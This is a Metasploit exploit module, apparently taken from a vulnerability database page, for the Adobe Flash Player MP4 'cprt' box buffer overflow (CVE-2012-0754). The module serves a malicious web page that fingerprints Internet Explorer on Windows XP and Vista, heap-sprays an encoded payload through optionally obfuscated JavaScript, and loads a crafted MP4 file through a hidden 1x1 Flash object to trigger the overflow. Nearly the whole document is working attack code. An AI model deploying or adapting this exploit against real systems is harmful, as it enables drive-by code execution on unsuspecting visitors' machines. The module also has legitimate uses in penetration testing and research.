ZeroBox Vulnerability Database

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::Remote::HttpServer::HTML
    def initialize(info={})
        super(update_info(info,
            'Name'           => "Adobe Flash Player MP4 cprt box Buffer Overflow",
            'Description'    => %q{
                    This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx
                component.  When processing a MP4 file
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'hongin[at]zeroxss.com'
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-0754' ],
                    [ 'URL', 'http://www.zeroxss.com/' ],
                    [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ],
                ],
            'Payload'        =>
                {
                    'BadChars'        => "\x00",
                    'StackAdjustment' => -3500
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction'         => "seh",
                    'InitialAutoRunScript' => 'migrate -f'
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', {} ],
                    [ 'IE 6 on Windows XP SP3',         { 'Offset' => '0x600' } ], #0x5f4 = spot on
                    [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "2012.03.06",
            'DefaultTarget'  => 0))
            register_options(
                [
                    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
                    OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
                ], self.class)
    end
    def get_target(agent)
        #If the user is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'
        if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
            return targets[1]
        elsif agent =~ /MSIE 7/
            return targets[2]
        else
            return nil
        end
    end
    def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
        my_target = get_target(agent)
        # Avoid the attack if the victim doesn't have the same setup we're targeting
        if my_target.nil?
            print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
            send_not_found(cli)
            return
        end
        # The SWF requests our MP4 trigger
        if request.uri =~ /\.mp4$/
            print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
            #print_error("Sorry, not sending you the mp4 for now")
            #send_not_found(cli)
            send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
            return
        end
        # Set payload depending on target
        p = payload.encoded
        js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
        js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
        js = <<-JS
        var heap_obj = new heapLib.ie(0x20000);
        var code = unescape("#{js_code}");
        var nops = unescape("#{js_nops}");
        while (nops.length < 0x80000) nops += nops;
        var offset = nops.substring(0, #{my_target['Offset']});
        var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
        while (shellcode.length < 0x40000) shellcode += shellcode;
        var block = shellcode.substring(0, (0x80000-6)/2);
        heap_obj.gc();
        for (var i=1; i < 0x300; i++) {
            heap_obj.alloc(block);
        }
        JS
        js = heaplib(js, {:noobfu => true})
        if datastore['OBFUSCATE']
            js = ::Rex::Exploitation::JSObfu.new(js)
            js.obfuscate
        end
        myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
        mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
        swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
        html = %Q|
        <html>
        <head>
        <script>
        #{js}
        </script>
        </head>
        <body>
        <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
        <param name="movie" value="#{swf_uri}">
        </object>
        </body>
        </html>
        |
        html = html.gsub(/^\t\t/, '')
        print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
        send_response(cli, html, {'Content-Type'=>'text/html'})
    end
    def exploit
        @mp4 = create_mp4
        super
    end
    def create_mp4
        ftypAtom = "\x00\x00\x00\x18"                   #Size
        ftypAtom << "ftypmp42"
        ftypAtom << "\x00\x00\x00\x00"
        ftypAtom << "mp42isom"
        mdatAtom = "\x00\x00\x00\x0D"                   #Size
        mdatAtom << "cprt"
        mdatAtom << "\x00\xFF\xFF\xFF\x00\x00\x00\x00"
        m = ftypAtom + mdatAtom + "\x0C" * 22328
        return m
    end
end
#Example of SWF player URI:
#http://www.jeroenwijering.com/embed/mediaplayer.swf